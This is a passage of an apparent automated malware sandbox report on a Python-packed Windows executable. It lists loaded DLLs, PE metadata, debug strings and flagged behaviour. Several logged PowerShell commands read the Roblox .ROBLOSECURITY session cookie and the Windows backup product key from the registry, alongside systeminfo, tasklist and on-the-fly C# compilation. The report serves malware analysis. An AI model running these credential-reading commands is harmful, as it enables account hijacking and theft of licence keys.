              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: X9g8L63QGs.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: X9g8L63QGs.exeStatic file information: File size 7849526 > 1048576
              Source: X9g8L63QGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: X9g8L63QGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: X9g8L63QGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: X9g8L63QGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: X9g8L63QGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: X9g8L63QGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: X9g8L63QGs.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: X9g8L63QGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C620000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: X9g8L63QGs.exe, 00000007.00000002.1710702996.00007FFB0B9BF000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BEEA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: X9g8L63QGs.exe, 00000007.00000002.1711177920.00007FFB0BA55000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: X9g8L63QGs.exe, 00000004.00000003.1270486310.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BE52000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: X9g8L63QGs.exe, 00000004.00000003.1270486310.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BEEA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdb source: powershell.exe, 00000046.00000002.1499829000.0000017515AF3000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000061.00000002.1609980700.00007FF708100000.00000002.00000001.01000000.0000001F.sdmp, rar.exe, 00000061.00000000.1596460046.00007FF708100000.00000002.00000001.01000000.0000001F.sdmp, rar.exe.4.dr
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1716138569.00007FFB1D5B1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: X9g8L63QGs.exe, 00000007.00000002.1714464196.00007FFB167AB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715936942.00007FFB1D341000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdbhPa source: powershell.exe, 00000046.00000002.1499829000.0000017515AF3000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: X9g8L63QGs.exe, 00000007.00000002.1714464196.00007FFB167AB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: X9g8L63QGs.exe, 00000007.00000002.1711177920.00007FFB0BA55000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdb source: powershell.exe, 00000046.00000002.1579982318.000001752C6A9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: X9g8L63QGs.exe, 00000007.00000002.1712634643.00007FFB0BFE1000.00000040.00000001.01000000.0000000F.sdmp
              Source: X9g8L63QGs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: X9g8L63QGs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: X9g8L63QGs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: X9g8L63QGs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: X9g8L63QGs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.4.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1AB121D0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,7_2_00007FFB1AB121D0
              Source: select.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0xfa84
              Source: unicodedata.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x4adf9
              Source: sqlite3.dll.4.drStatic PE information: real checksum: 0x0 should be: 0xafbc4
              Source: X9g8L63QGs.exeStatic PE information: real checksum: 0x783c8d should be: 0x77cc44
              Source: _queue.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x166ae
              Source: _socket.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x1381f
              Source: python312.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x1bf182
              Source: libffi-8.dll.4.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _lzma.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x2397a
              Source: _bz2.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x189fc
              Source: _decimal.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x27e7b
              Source: _ctypes.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x1e3fe
              Source: _ssl.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x117b7
              Source: libcrypto-3.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x197f77
              Source: _sqlite3.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0xfc53
              Source: libssl-3.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x4330c
              Source: bexzy300.dll.71.drStatic PE information: real checksum: 0x0 should be: 0x4f6b
              Source: _hashlib.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0xfd4b
              Source: libffi-8.dll.4.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.4.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.4.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5C31 push r10; ret 7_2_00007FFB0B8B5C33
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B8419 push r10; retf 7_2_00007FFB0B8B8485
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B9327 push rsp; ret 7_2_00007FFB0B8B9328
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B82D8 push rdi; iretd 7_2_00007FFB0B8B82DA
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B6859 push rsi; ret 7_2_00007FFB0B8B6890
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B808B push r12; iretd 7_2_00007FFB0B8B809F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5FB9 push r10; ret 7_2_00007FFB0B8B5FCC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B7FFF push r12; ret 7_2_00007FFB0B8B804A
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5F56 push r12; ret 7_2_00007FFB0B8B5F73
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B8F42 push rsp; iretq 7_2_00007FFB0B8B8F43
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B7F67 push rbp; iretq 7_2_00007FFB0B8B7F68
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5F7B push r8; ret 7_2_00007FFB0B8B5F83
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5EB4 push rsp; iretd 7_2_00007FFB0B8B5EB5
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5F01 push r12; ret 7_2_00007FFB0B8B5F10
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B763E push rbp; retf 7_2_00007FFB0B8B7657
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B5E67 push rdi; iretd 7_2_00007FFB0B8B5E69
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B7689 push r12; ret 7_2_00007FFB0B8B76CD
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B8DBF push rsp; retf 7_2_00007FFB0B8B8DC0
